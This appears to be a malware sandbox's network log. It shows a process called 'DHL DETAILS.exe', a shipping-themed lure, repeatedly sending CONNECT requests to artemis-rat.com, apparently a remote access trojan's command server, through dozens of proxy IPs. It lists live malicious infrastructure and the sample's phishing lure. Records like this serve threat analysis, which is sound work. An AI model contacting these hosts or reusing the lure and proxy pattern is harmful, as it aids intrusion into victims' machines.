Mar 9, 2024 13:14:20.003089905 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.157778025 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:20 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1628	192.168.2.5	55082	178.128.157.114	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.007863045 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1629	192.168.2.5	55083	178.128.157.114	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.008455992 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1630	192.168.2.5	55086	178.128.157.114	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.009151936 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1631	192.168.2.5	55089	178.128.157.114	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.010457039 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1632	192.168.2.5	55096	43.153.172.76	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.014226913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1633	192.168.2.5	55099	43.153.172.76	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.015029907 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1634	192.168.2.5	54942	45.231.133.51	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.017211914 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.703615904 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.092276096 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:21.092957020 CET	369	OUT	Data Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ec 52 9b 06 0f ab 38 c3 73 8a 0b 61 4c 06 03 c0 a0 de f7 82 ef 4d c4 ad 1a 15 d5 4a c2 e6 2c 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: lheR8saLMJ,*,+0/$#('=<5/artemis-rat.com#U_EWT"e'2`.Ujwb>>Tk`[`1<I+^4
Mar 9, 2024 13:14:21.482938051 CET	536	IN	Data Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ec 52 9d 0b 6c 7c 2f 31 f8 71 07 22 e1 9e b0 18 1c 7f d9 0a 70 16 0a 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00 Data Ascii: C?eRl\|/1q"pDOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
Mar 9, 2024 13:14:21.483041048 CET	536	IN	Data Raw: c6 05 92 78 e0 4f 78 0a d2 60 c4 1d 4d 2f 50 10 83 ed 02 03 01 00 01 a3 82 02 75 30 82 02 71 30 0e 06 03 55 1d 0f 01 01 ff 04 04 03 02 05 a0 30 13 06 03 55 1d 25 04 0c 30 0a 06 08 2b 06 01 05 05 07 03 01 30 0c 06 03 55 1d 13 01 01 ff 04 02 30 00 Data Ascii: xOx`M/Pu0q0U0U%0+0U00U<IXM%A'CF20U#0n+_+0x+l0j05+0)http://ocsp.pki.goog/s/gts1p5/4mHaPTRzkCs01+0%http://pki.g
Mar 9, 2024 13:14:21.483078957 CET	376	IN	Data Raw: 00 76 00 da b6 bf 6b 3f b5 b6 22 9f 9b c2 bb 5c 6b e8 70 91 71 6c bb 51 84 85 34 bd a4 3d 30 48 d7 fb ab 00 00 01 8d aa 09 6c 5a 00 00 04 03 00 47 30 45 02 20 14 4e 3d 50 55 e8 cc 24 1d 57 8b ac c0 53 a0 61 43 18 61 8b d3 67 2d ed cd aa b3 4e 5c Data Ascii: vk?"\kpqlQ4=0HlZG0E N=PU$WSaCag-N\:b!ixanr9,1rtlY0*HR5zo_$F\|QNc4+G@]LiY%}+]24'-6TsnqM}oVM)k+T/
Mar 9, 2024 13:14:21.487431049 CET	536	IN	Data Raw: 7c f0 30 c1 81 dd bd 46 3c 84 41 91 c0 f9 72 70 be e9 27 7e 00 05 90 30 82 05 8c 30 82 03 74 a0 03 02 01 02 02 0d 02 03 bc 50 a3 27 53 f0 91 80 22 ed f1 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 47 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 Data Ascii: \|0F<Arp'~00tP'S"0*H0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R10200813000042Z270930000042Z0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P5
Mar 9, 2024 13:14:21.487473965 CET	536	IN	Data Raw: 01 a3 82 01 76 30 82 01 72 30 0e 06 03 55 1d 0f 01 01 ff 04 04 03 02 01 86 30 1d 06 03 55 1d 25 04 16 30 14 06 08 2b 06 01 05 05 07 03 01 06 08 2b 06 01 05 05 07 03 02 30 12 06 03 55 1d 13 01 01 ff 04 08 30 06 01 01 ff 02 01 00 30 1d 06 03 55 1d Data Ascii: v0r0U0U%0++0U00Un+_+0U#0+&q+H'/Rf,q>0h+\0Z0&+0http://ocsp.pki.goog/gtsr100+0$http://pki.goog/repo/certs/gtsr1.
Mar 9, 2024 13:14:21.487498999 CET	536	IN	Data Raw: b8 47 b5 e9 96 b5 9f 07 cd a6 ab 3e 32 8a c0 86 83 c5 c1 41 c8 9f 2f 35 8e 0d c0 07 7a e1 ac c9 65 b5 cb 8a a7 dd 71 d8 61 65 39 84 ac 32 3e f7 7a 36 f1 56 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 Data Ascii: G>2A/5zeqae92>z6VWAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?'>#ZB-z6=`9cxN!>\9+S/tgw7-[pe
Mar 9, 2024 13:14:21.487570047 CET	536	IN	Data Raw: 32 38 30 30 30 30 34 32 5a 30 47 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 22 30 20 06 03 55 04 0a 13 19 47 6f 6f 67 6c 65 20 54 72 75 73 74 20 53 65 72 76 69 63 65 73 20 4c 4c 43 31 14 30 12 06 03 55 04 03 13 0b 47 54 53 20 52 6f 6f 74 20 52 31 Data Ascii: 28000042Z0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R10"0*H0w;>@<}2qj.K+^R#'c~^hZGM3NlKd)%#=.`
Mar 9, 2024 13:14:21.487590075 CET	536	IN	Data Raw: 3a 66 ec 07 8a 26 df 13 d7 57 65 78 27 de 5e 49 14 00 a2 00 7f 9a a8 21 b6 a9 b1 95 b0 a5 b9 0d 16 11 da c7 6c 48 3c 40 e0 7e 0d 5a cd 56 3c d1 97 05 b9 cb 4b ed 39 4b 9c c4 3f d2 55 13 6e 24 b0 d6 71 fa f4 c1 ba cc ed 1b f5 fe 81 41 d8 00 98 3d Data Ascii: :f&Wex'^I!lH<@~ZV<K9K?Un$qA=:z78040U0U00U+&q+H'/Rf,q>0U#0`{fEP/}4K0`+T0R0%+0http://ocsp.
Mar 9, 2024 13:14:21.487632990 CET	466	IN	Data Raw: a1 e4 1a d6 fd 6f 83 81 6f ef 8c cf 97 af c0 85 2a f0 f5 4e 69 09 91 2d e1 68 b8 c1 2b 73 e9 d4 d9 fc 22 c0 37 1f 0b 66 1d 49 ed 02 55 8f 67 e1 32 d7 d3 26 bf 70 e3 3d f4 67 6d 3d 7c e5 34 88 e3 32 fa a7 6e 06 6a 6f bd 8b 91 ee 16 4b e8 3b a9 b3 Data Ascii: ooNi-h+s"7fIUg2&p=gm=\|42njoK;7D~lF!fUl)f[wIH(3rS5b$9~AR?,( MJJZ*R\|AP \`8V~%N:)Dkt"Q9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1635	192.168.2.5	55100	43.153.172.76	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.017338991 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1636	192.168.2.5	53293	51.15.223.12	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.017416000 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:23.130029917 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:26.130058050 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.146459103 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1637	192.168.2.5	55000	172.67.182.90	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.070493937 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.228606939 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:20 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1638	192.168.2.5	54291	209.222.97.30	62543	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.070825100 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1639	192.168.2.5	54318	51.222.241.157	44029	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.071132898 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.723980904 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.333414078 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.536444902 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:24.833250046 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.098834038 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.442758083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.146197081 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1640	192.168.2.5	54247	103.162.141.154	85	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.071191072 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1641	192.168.2.5	55101	43.153.172.76	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.071722984 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1642	192.168.2.5	50463	217.112.80.252	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.071919918 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1643	192.168.2.5	54188	51.15.242.202	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.071921110 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:23.130080938 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:26.130068064 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.146482944 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1644	192.168.2.5	53874	68.1.210.189	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.091698885 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1645	192.168.2.5	54400	91.92.155.207	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.092973948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.404526949 CET	28	IN	HTTP/1.1 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1646	192.168.2.5	55028	68.71.247.130	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.111187935 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1647	192.168.2.5	54199	41.223.234.116	37259	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.115727901 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1648	192.168.2.5	55013	38.54.6.39	9080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.119039059 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1649	192.168.2.5	55036	104.20.75.69	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.121287107 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.275363922 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:20 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1650	192.168.2.5	55044	172.67.127.188	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.132102013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.286125898 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:20 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1651	192.168.2.5	54234	134.122.81.141	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.140651941 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1652	192.168.2.5	54972	159.223.71.71	60512	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:20.140841007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.833260059 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.833767891 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
